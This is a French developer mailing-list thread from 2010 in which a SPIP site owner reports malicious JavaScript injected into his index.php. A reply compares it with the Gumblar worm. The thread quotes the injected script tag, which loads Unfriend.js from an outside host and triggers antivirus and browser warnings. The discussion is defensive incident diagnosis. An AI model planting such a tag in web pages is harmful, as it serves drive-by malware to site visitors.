[spip-dev] Code malveillant dans index.php

Bonjour,

Je viens de m’apercevoir que sur la page d’accueil de mon site (http://www.creamama.fr), il y avait un code que je suppose malveillant dans l’index.php. C’est une insertion javascript : (non commenté sur mon site)

Google Chrome détecte mon site comme potentiellement dangereux, mais l’outil de diagnostic de google webmaster tool ne voit rien.

Mon antivirus (Sophos) détecte un buffer overflow, et la machine java se lance sur mon pc.

A mon avis, c’est pas très cool comme truc, est ce que quelqu’un à déjà vu ça ?

Merci

* matthieu leorat tapuscrivait, le 18/06/2010 09:39:

Bonjour,

Je viens de m'apercevoir que sur la page d'accueil de mon site (
http://www.creamama.fr), il y avait un code que je suppose malveillant dans
l'index.php. C'est une insertion javascript : (non commenté sur mon site)

<!--<script type="text/javascript" src="
http://oployau.fancountblogger.com:8080/Unfriend.js&quot;&gt;&lt;/script&gt;//\-\-&gt;
<!--3cda83f363e75fac33ffcb2332869ae6-->

Google Chrome détecte mon site comme potentiellement dangereux, mais l'outil
de diagnostic de google webmaster tool ne voit rien.

Mon antivirus (Sophos) détecte un buffer overflow, et la machine java se
lance sur mon pc.

A mon avis, c'est pas très cool comme truc, est ce que quelqu'un à déjà vu
ça ?

<!--<script type="text/javascript" src="
http://oployau.fancountblogger.com:8080/Unfriend.js&quot;&gt;&lt;/script&gt;//\-\-&gt;
<!--3cda83f363e75fac33ffcb2332869ae6-->

Sécurité : attention au ver Gumblar - ZZZ

ça ressemble mais ce n'est pas le même ver, car gumblar contient une
chaîne "unescape"

la seule référence à unfriend.js trouvée sur google, c'est
http://blog.unmaskparasites.com/2010/06/17/malware-on-hijacked-subdomains-part-2/

(et aussi le message qui a lancé cette conversation)

-- Fil